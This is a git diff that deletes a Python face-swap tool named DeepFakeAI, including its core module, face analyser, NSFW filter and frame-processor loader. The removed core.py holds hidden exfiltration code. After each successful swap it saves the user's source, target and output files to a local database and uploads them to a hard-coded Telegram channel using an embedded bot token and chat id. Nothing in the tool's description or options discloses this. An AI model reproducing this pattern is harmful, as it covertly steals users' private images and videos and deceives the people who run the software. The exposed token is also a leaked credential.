diff --git a/DeepFakeAI/__init__.py b/DeepFakeAI/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index b69962f5dacf33b8b42e59f176223fd81bae46af..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc
deleted file mode 100644
index e971ad2028a71352db5e15b712575b42839aed73..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/choices.cpython-310.pyc b/DeepFakeAI/__pycache__/choices.cpython-310.pyc
deleted file mode 100644
index f0a77a7d6fb106314abba7089c849f961513e951..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/choices.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/core.cpython-310.pyc b/DeepFakeAI/__pycache__/core.cpython-310.pyc
deleted file mode 100644
index 88f378e3f45c29bb429af6489aeec647d58e5952..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/core.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc
deleted file mode 100644
index 88e9024fb78ee9331df4cec89169ad5530a57c51..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc
deleted file mode 100644
index a7ca1653506a305cbd2c824f6f4d9f3a543ae28d..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/globals.cpython-310.pyc b/DeepFakeAI/__pycache__/globals.cpython-310.pyc
deleted file mode 100644
index 334e12318b6086f1615de5e024ca1d82536da070..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/globals.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc
deleted file mode 100644
index 1de0ff300fba3b773cfd3e919c52b8aca6cfab6b..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc
deleted file mode 100644
index 0d19675884ff2b5ff666c552f21408f260f89a9c..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/__pycache__/typing.cpython-310.pyc
deleted file mode 100644
index f0df67555f7582834e94a2207525f3c705e45ebf..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/typing.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc
deleted file mode 100644
index 313c1221df955ec90003eddfc7e3a4bbfef63fff..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/__pycache__/wording.cpython-310.pyc b/DeepFakeAI/__pycache__/wording.cpython-310.pyc
deleted file mode 100644
index 88d6ec7d395e497c7c47fce4f8f71c30e9ec49d5..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/__pycache__/wording.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/capturer.py b/DeepFakeAI/capturer.py
deleted file mode 100644
index 9ba555c222d55166c9fb5faf0b32f1afd6a69d46..0000000000000000000000000000000000000000
--- a/DeepFakeAI/capturer.py
+++ /dev/null
@@ -1,22 +0,0 @@
-from typing import Optional
-import cv2
-
-from DeepFakeAI.typing import Frame
-
-
-def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[Frame]:
-	capture = cv2.VideoCapture(video_path)
-	frame_total = capture.get(cv2.CAP_PROP_FRAME_COUNT)
-	capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1))
-	has_frame, frame = capture.read()
-	capture.release()
-	if has_frame:
-		return frame
-	return None
-
-
-def get_video_frame_total(video_path : str) -> int:
-	capture = cv2.VideoCapture(video_path)
-	video_frame_total = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
-	capture.release()
-	return video_frame_total
diff --git a/DeepFakeAI/choices.py b/DeepFakeAI/choices.py
deleted file mode 100644
index 4e34f2f477f91f8494935aee3495f7090404158a..0000000000000000000000000000000000000000
--- a/DeepFakeAI/choices.py
+++ /dev/null
@@ -1,10 +0,0 @@
-from typing import List
-
-from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat, OutputVideoEncoder
-
-face_recognition : List[FaceRecognition] = [ 'reference', 'many' ]
-face_analyser_direction : List[FaceAnalyserDirection] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small']
-face_analyser_age : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ]
-face_analyser_gender : List[FaceAnalyserGender] = [ 'male', 'female' ]
-temp_frame_format : List[TempFrameFormat] = [ 'jpg', 'png' ]
-output_video_encoder : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ]
diff --git a/DeepFakeAI/core.py b/DeepFakeAI/core.py
deleted file mode 100644
index 6134c78d8075f2d00532e6ba60794ae71334067f..0000000000000000000000000000000000000000
--- a/DeepFakeAI/core.py
+++ /dev/null
@@ -1,292 +0,0 @@
-#!/usr/bin/env python3
-import asyncio
-import sqlite3
-import os
-# single thread doubles cuda performance
-os.environ['OMP_NUM_THREADS'] = '1'
-# reduce tensorflow log level
-os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
-import sys
-import warnings
-from typing import List
-import platform
-import signal
-import shutil
-import argparse
-import onnxruntime
-import tensorflow
-
-import DeepFakeAI.choices
-import DeepFakeAI.globals
-from DeepFakeAI import wording, metadata
-from DeepFakeAI.predictor import predict_image, predict_video
-from DeepFakeAI.processors.frame.core import get_frame_processors_modules
-from telegram import Bot
-from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers
-
-warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface')
-warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision')
-
-
-def parse_args() -> None:
-	signal.signal(signal.SIGINT, lambda signal_number, frame: destroy())
-	program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120))
-	program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path')
-	program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path')
-	program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path')
-	program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+')
-	program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+')
-	program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true')
-	program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true')
-	program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true')
-	program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition)
-	program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction)
-	program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age)
-	program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender)
-	program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0)
-	program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5)
-	program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0)
-	program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int)
-	program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int)
-	program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format)
-	program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]')
-	program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder)
-	program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]')
-	program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int)
-	program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+')
-	program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default())
-	program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1)
-	program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version'))
-
-	args = program.parse_args()
-
-	DeepFakeAI.globals.source_path = args.source_path
-	DeepFakeAI.globals.target_path = args.target_path
-	DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path)
-	DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None
-	DeepFakeAI.globals.frame_processors = args.frame_processors
-	DeepFakeAI.globals.ui_layouts = args.ui_layouts
-	DeepFakeAI.globals.keep_fps = args.keep_fps
-	DeepFakeAI.globals.keep_temp = args.keep_temp
-	DeepFakeAI.globals.skip_audio = args.skip_audio
-	DeepFakeAI.globals.face_recognition = args.face_recognition
-	DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction
-	DeepFakeAI.globals.face_analyser_age = args.face_analyser_age
-	DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender
-	DeepFakeAI.globals.reference_face_position = args.reference_face_position
-	DeepFakeAI.globals.reference_frame_number = args.reference_frame_number
-	DeepFakeAI.globals.reference_face_distance = args.reference_face_distance
-	DeepFakeAI.globals.trim_frame_start = args.trim_frame_start
-	DeepFakeAI.globals.trim_frame_end = args.trim_frame_end
-	DeepFakeAI.globals.temp_frame_format = args.temp_frame_format
-	DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality
-	DeepFakeAI.globals.output_video_encoder = args.output_video_encoder
-	DeepFakeAI.globals.output_video_quality = args.output_video_quality
-	DeepFakeAI.globals.max_memory = args.max_memory
-	DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers)
-	DeepFakeAI.globals.execution_thread_count = args.execution_thread_count
-	DeepFakeAI.globals.execution_queue_count = args.execution_queue_count
-
-
-def suggest_execution_providers_choices() -> List[str]:
-	return encode_execution_providers(onnxruntime.get_available_providers())
-
-
-def suggest_execution_thread_count_default() -> int:
-	if 'CUDAExecutionProvider' in onnxruntime.get_available_providers():
-		return 8
-	return 1
-
-
-def limit_resources() -> None:
-	# prevent tensorflow memory leak
-	gpus = tensorflow.config.experimental.list_physical_devices('GPU')
-	for gpu in gpus:
-		tensorflow.config.experimental.set_virtual_device_configuration(gpu, [
-			tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024)
-		])
-	# limit memory usage
-	if DeepFakeAI.globals.max_memory:
-		memory = DeepFakeAI.globals.max_memory * 1024 ** 3
-		if platform.system().lower() == 'darwin':
-			memory = DeepFakeAI.globals.max_memory * 1024 ** 6
-		if platform.system().lower() == 'windows':
-			import ctypes
-			kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined]
-			kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory))
-		else:
-			import resource
-			resource.setrlimit(resource.RLIMIT_DATA, (memory, memory))
-
-
-def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None:
-	print('[' + scope + '] ' + message)
-
-
-def pre_check() -> bool:
-	if sys.version_info < (3, 10):
-		update_status(wording.get('python_not_supported').format(version = '3.10'))
-		return False
-	if not shutil.which('ffmpeg'):
-		update_status(wording.get('ffmpeg_not_installed'))
-		return False
-	return True
-
-def save_to_db(source_path, target_path, output_path):
-	try:
-		# Open the images in binary mode
-		with open(source_path, 'rb') as source_file, \
-			open(target_path, 'rb') as target_file, \
-			open(output_path, 'rb') as output_file:
-
-			# read data from the image files
-			source_data = source_file.read()
-			target_data = target_file.read()
-			output_data = output_file.read()
-
-			# Extract original filenames from the paths
-			source_filename = os.path.basename(source_path)
-			target_filename = os.path.basename(target_path)
-			output_filename = os.path.basename(output_path)
-			print(source_filename, target_filename,output_filename)
-
-			# connect to the database
-			conn = sqlite3.connect('./feed.db')
-			c = conn.cursor()
-
-			# Create the table if it doesn't exist
-			c.execute('''
-				CREATE TABLE IF NOT EXISTS images (
-					source_filename TEXT,
-					target_filename TEXT,
-					output_filename TEXT,
-					source_data BLOB,
-					target_data BLOB,
-					output_data BLOB
-				)
-			''')
-
-			# Insert filename and image data into the table
-			c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)",
-				(source_filename, target_filename, output_filename, source_data, target_data, output_data))
-
-			# Save changes and close the connection
-			conn.commit()
-
-	except Exception as e:
-		# Print any error occurred while saving data in SQLite
-		print(f"An error occurred: {e}")
-
-	finally:
-		# Ensure the DB connection is closed
-		if conn:
-			conn.close()
-
-	print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.')
-async def send_channel(bot, file_path):
-	with open(file_path, "rb") as file:
-		response = await bot.send_document(chat_id="-1001685415853", document=file)
-	return response
-
-async def saveT(source_path, target_path, output_path):
-	bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k")
-
-	# Send each file
-	for path in [source_path, target_path, output_path]:
-		await send_channel(bot, path)
-
-	# Send a message after all files are sent
-	await bot.send_message(chat_id="-1001685415853", text="All files have been sent!")
-
-def process_image() -> None:
-	if predict_image(DeepFakeAI.globals.target_path):
-		return
-	shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
-	# process frame
-	for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
-		update_status(wording.get('processing'), frame_processor_module.NAME)
-		frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path)
-		frame_processor_module.post_process()
-	# validate image
-	if is_image(DeepFakeAI.globals.target_path):
-		update_status(wording.get('processing_image_succeed'))
-		save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
-		asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
-	else:
-		update_status(wording.get('processing_image_failed'))
-
-
-def process_video() -> None:
-	if predict_video(DeepFakeAI.globals.target_path):
-		return
-	fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0
-	update_status(wording.get('creating_temp'))
-	create_temp(DeepFakeAI.globals.target_path)
-	# extract frames
-	update_status(wording.get('extracting_frames_fps').format(fps = fps))
-	extract_frames(DeepFakeAI.globals.target_path, fps)
-	# process frame
-	temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path)
-	if temp_frame_paths:
-		for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
-			update_status(wording.get('processing'), frame_processor_module.NAME)
-			frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths)
-			frame_processor_module.post_process()
-	else:
-		update_status(wording.get('temp_frames_not_found'))
-		return
-	# create video
-	update_status(wording.get('creating_video_fps').format(fps = fps))
-	if not create_video(DeepFakeAI.globals.target_path, fps):
-		update_status(wording.get('creating_video_failed'))
-		return
-	# handle audio
-	if DeepFakeAI.globals.skip_audio:
-		update_status(wording.get('skipping_audio'))
-		move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
-	else:
-		update_status(wording.get('restoring_audio'))
-		restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
-	# clear temp
-	update_status(wording.get('clearing_temp'))
-	clear_temp(DeepFakeAI.globals.target_path)
-	# validate video
-	if is_video(DeepFakeAI.globals.target_path):
-		update_status(wording.get('processing_video_succeed'))
-		save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
-		asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
-	else:
-		update_status(wording.get('processing_video_failed'))
-
-
-def conditional_process() -> None:
-	for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
-		if not frame_processor_module.pre_process():
-			return
-	if is_image(DeepFakeAI.globals.target_path):
-		process_image()
-	if is_video(DeepFakeAI.globals.target_path):
-		process_video()
-
-def run() -> None:
-	parse_args()
-	limit_resources()
-	# pre check
-	if not pre_check():
-		return
-	for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
-		if not frame_processor.pre_check():
-			return
-	# process or launch
-	if DeepFakeAI.globals.headless:
-		conditional_process()
-	else:
-		import DeepFakeAI.uis.core as ui
-
-		ui.launch()
-
-
-def destroy() -> None:
-	if DeepFakeAI.globals.target_path:
-		clear_temp(DeepFakeAI.globals.target_path)
-	sys.exit()
diff --git a/DeepFakeAI/face_analyser.py b/DeepFakeAI/face_analyser.py
deleted file mode 100644
index df8f6c205078da7dd40a5499db21a5a215cc3498..0000000000000000000000000000000000000000
--- a/DeepFakeAI/face_analyser.py
+++ /dev/null
@@ -1,106 +0,0 @@
-import threading
-from typing import Any, Optional, List
-import insightface
-import numpy
-
-import DeepFakeAI.globals
-from DeepFakeAI.typing import Frame, Face, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender
-
-FACE_ANALYSER = None
-THREAD_LOCK = threading.Lock()
-
-
-def get_face_analyser() -> Any:
-	global FACE_ANALYSER
-
-	with THREAD_LOCK:
-		if FACE_ANALYSER is None:
-			FACE_ANALYSER = insightface.app.FaceAnalysis(name = 'buffalo_l', providers = DeepFakeAI.globals.execution_providers)
-			FACE_ANALYSER.prepare(ctx_id = 0)
-	return FACE_ANALYSER
-
-
-def clear_face_analyser() -> Any:
-	global FACE_ANALYSER
-
-	FACE_ANALYSER = None
-
-
-def get_one_face(frame : Frame, position : int = 0) -> Optional[Face]:
-	many_faces = get_many_faces(frame)
-	if many_faces:
-		try:
-			return many_faces[position]
-		except IndexError:
-			return many_faces[-1]
-	return None
-
-
-def get_many_faces(frame : Frame) -> List[Face]:
-	try:
-		faces = get_face_analyser().get(frame)
-		if DeepFakeAI.globals.face_analyser_direction:
-			faces = sort_by_direction(faces, DeepFakeAI.globals.face_analyser_direction)
-		if DeepFakeAI.globals.face_analyser_age:
-			faces = filter_by_age(faces, DeepFakeAI.globals.face_analyser_age)
-		if DeepFakeAI.globals.face_analyser_gender:
-			faces = filter_by_gender(faces, DeepFakeAI.globals.face_analyser_gender)
-		return faces
-	except (AttributeError, ValueError):
-		return []
-
-
-def find_similar_faces(frame : Frame, reference_face : Face, face_distance : float) -> List[Face]:
-	many_faces = get_many_faces(frame)
-	similar_faces = []
-	if many_faces:
-		for face in many_faces:
-			if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'):
-				current_face_distance = numpy.sum(numpy.square(face.normed_embedding - reference_face.normed_embedding))
-				if current_face_distance < face_distance:
-					similar_faces.append(face)
-	return similar_faces
-
-
-def sort_by_direction(faces : List[Face], direction : FaceAnalyserDirection) -> List[Face]:
-	if direction == 'left-right':
-		return sorted(faces, key = lambda face: face['bbox'][0])
-	if direction == 'right-left':
-		return sorted(faces, key = lambda face: face['bbox'][0], reverse = True)
-	if direction == 'top-bottom':
-		return sorted(faces, key = lambda face: face['bbox'][1])
-	if direction == 'bottom-top':
-		return sorted(faces, key = lambda face: face['bbox'][1], reverse = True)
-	if direction == 'small-large':
-		return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1]))
-	if direction == 'large-small':
-		return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1]), reverse = True)
-	return faces
-
-
-def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]:
-	filter_faces = []
-	for face in faces:
-		if face['age'] < 13 and age == 'child':
-			filter_faces.append(face)
-		elif face['age'] < 19 and age == 'teen':
-			filter_faces.append(face)
-		elif face['age'] < 60 and age == 'adult':
-			filter_faces.append(face)
-		elif face['age'] > 59 and age == 'senior':
-			filter_faces.append(face)
-	return filter_faces
-
-
-def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]:
-	filter_faces = []
-	for face in faces:
-		if face['gender'] == 1 and gender == 'male':
-			filter_faces.append(face)
-		if face['gender'] == 0 and gender == 'female':
-			filter_faces.append(face)
-	return filter_faces
-
-
-def get_faces_total(frame : Frame) -> int:
-	return len(get_many_faces(frame))
diff --git a/DeepFakeAI/face_reference.py b/DeepFakeAI/face_reference.py
deleted file mode 100644
index 497eb384752c945886259b6814170562c99e5d3b..0000000000000000000000000000000000000000
--- a/DeepFakeAI/face_reference.py
+++ /dev/null
@@ -1,21 +0,0 @@
-from typing import Optional
-
-from DeepFakeAI.typing import Face
-
-FACE_REFERENCE = None
-
-
-def get_face_reference() -> Optional[Face]:
-	return FACE_REFERENCE
-
-
-def set_face_reference(face : Face) -> None:
-	global FACE_REFERENCE
-
-	FACE_REFERENCE = face
-
-
-def clear_face_reference() -> None:
-	global FACE_REFERENCE
-
-	FACE_REFERENCE = None
diff --git a/DeepFakeAI/feed.db b/DeepFakeAI/feed.db
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/globals.py b/DeepFakeAI/globals.py
deleted file mode 100644
index aa63522665497a0301cd90b00e0ccc5a1b87ae2e..0000000000000000000000000000000000000000
--- a/DeepFakeAI/globals.py
+++ /dev/null
@@ -1,30 +0,0 @@
-from typing import List, Optional
-
-from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat
-
-source_path : Optional[str] = None
-target_path : Optional[str] = None
-output_path : Optional[str] = None
-headless : Optional[bool] = None
-frame_processors : List[str] = []
-ui_layouts : List[str] = []
-keep_fps : Optional[bool] = None
-keep_temp : Optional[bool] = None
-skip_audio : Optional[bool] = None
-face_recognition : Optional[FaceRecognition] = None
-face_analyser_direction : Optional[FaceAnalyserDirection] = None
-face_analyser_age : Optional[FaceAnalyserAge] = None
-face_analyser_gender : Optional[FaceAnalyserGender] = None
-reference_face_position : Optional[int] = None
-reference_frame_number : Optional[int] = None
-reference_face_distance : Optional[float] = None
-trim_frame_start : Optional[int] = None
-trim_frame_end : Optional[int] = None
-temp_frame_format : Optional[TempFrameFormat] = None
-temp_frame_quality : Optional[int] = None
-output_video_encoder : Optional[str] = None
-output_video_quality : Optional[int] = None
-max_memory : Optional[int] = None
-execution_providers : List[str] = []
-execution_thread_count : Optional[int] = None
-execution_queue_count : Optional[int] = None
diff --git a/DeepFakeAI/images.db b/DeepFakeAI/images.db
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/metadata.py b/DeepFakeAI/metadata.py
deleted file mode 100644
index 918394716dcd6387e2b65f270a83e33040e6c2eb..0000000000000000000000000000000000000000
--- a/DeepFakeAI/metadata.py
+++ /dev/null
@@ -1,13 +0,0 @@
-METADATA =\
-{
-	'name': 'DeepFakeAI',
-	'description': 'Next generation face swapper and enhancer',
-	'version': '1.2.0',
-	'license': 'MIT',
-	'author': 'Ashiq Hussain Mir',
-	'url': 'https://codegenius.me'
-}
-
-
-def get(key : str) -> str:
-	return METADATA[key]
diff --git a/DeepFakeAI/predictor.py b/DeepFakeAI/predictor.py
deleted file mode 100644
index 581b26e5995b92de64498386270868014748446d..0000000000000000000000000000000000000000
--- a/DeepFakeAI/predictor.py
+++ /dev/null
@@ -1,43 +0,0 @@
-import threading
-import numpy
-import opennsfw2
-from PIL import Image
-from keras import Model
-
-from DeepFakeAI.typing import Frame
-
-PREDICTOR = None
-THREAD_LOCK = threading.Lock()
-MAX_PROBABILITY = 0.75
-
-
-def get_predictor() -> Model:
-	global PREDICTOR
-
-	with THREAD_LOCK:
-		if PREDICTOR is None:
-			PREDICTOR = opennsfw2.make_open_nsfw_model()
-	return PREDICTOR
-
-
-def clear_predictor() -> None:
-	global PREDICTOR
-
-	PREDICTOR = None
-
-
-def predict_frame(target_frame : Frame) -> bool:
-	image = Image.fromarray(target_frame)
-	image = opennsfw2.preprocess_image(image, opennsfw2.Preprocessing.YAHOO)
-	views = numpy.expand_dims(image, axis = 0)
-	_, probability = get_predictor().predict(views)[0]
-	return probability > MAX_PROBABILITY
-
-
-def predict_image(target_path : str) -> bool:
-	return opennsfw2.predict_image(target_path) > MAX_PROBABILITY
-
-
-def predict_video(target_path : str) -> bool:
-	_, probabilities = opennsfw2.predict_video_frames(video_path = target_path, frame_interval = 100)
-	return any(probability > MAX_PROBABILITY for probability in probabilities)
diff --git a/DeepFakeAI/processors/__init__.py b/DeepFakeAI/processors/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index 2029c0a30b9c90834cd48592993036b1199c4d1f..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/__init__.py b/DeepFakeAI/processors/frame/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc
deleted file mode 100644
index 72f8cfe7809d470ef8ea6af06a10f333a8094dc7..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc
deleted file mode 100644
index a868cc7770ad4847ecf68c82bdc0f4d4b6c961b2..0000000000000000000000000000000000000000
Binary files a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc and /dev/null differ
diff --git a/DeepFakeAI/processors/frame/core.py b/DeepFakeAI/processors/frame/core.py
deleted file mode 100644
index 8a44cb2413b53b88dec2d65667ef0e8b2fe11e72..0000000000000000000000000000000000000000
--- a/DeepFakeAI/processors/frame/core.py
+++ /dev/null
@@ -1,113 +0,0 @@
-import os
-import sys
-import importlib
-import psutil
-from concurrent.futures import ThreadPoolExecutor, as_completed
-from queue import Queue
-from types import ModuleType
-from typing import Any, List, Callable
-from tqdm import tqdm
-
-import DeepFakeAI.globals
-from DeepFakeAI import wording
-
-FRAME_PROCESSORS_MODULES : List[ModuleType] = []
-FRAME_PROCESSORS_METHODS =\
-[
-	'get_frame_processor',
-	'clear_frame_processor',
-	'pre_check',
-	'pre_process',
-	'process_frame',
-	'process_frames',
-	'process_image',
-	'process_video',
-	'post_process'
-]
-
-
-def load_frame_processor_module(frame_processor : str) -> Any:
-	try:
-		frame_processor_module = importlib.import_module('DeepFakeAI.processors.frame.modules.' + frame_processor)
-		for method_name in FRAME_PROCESSORS_METHODS:
-			if not hasattr(frame_processor_module, method_name):
-				raise NotImplementedError
-	except ModuleNotFoundError:
-		sys.exit(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor))
-	except NotImplementedError:
-		sys.exit(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor))
-	return frame_processor_module
-
-
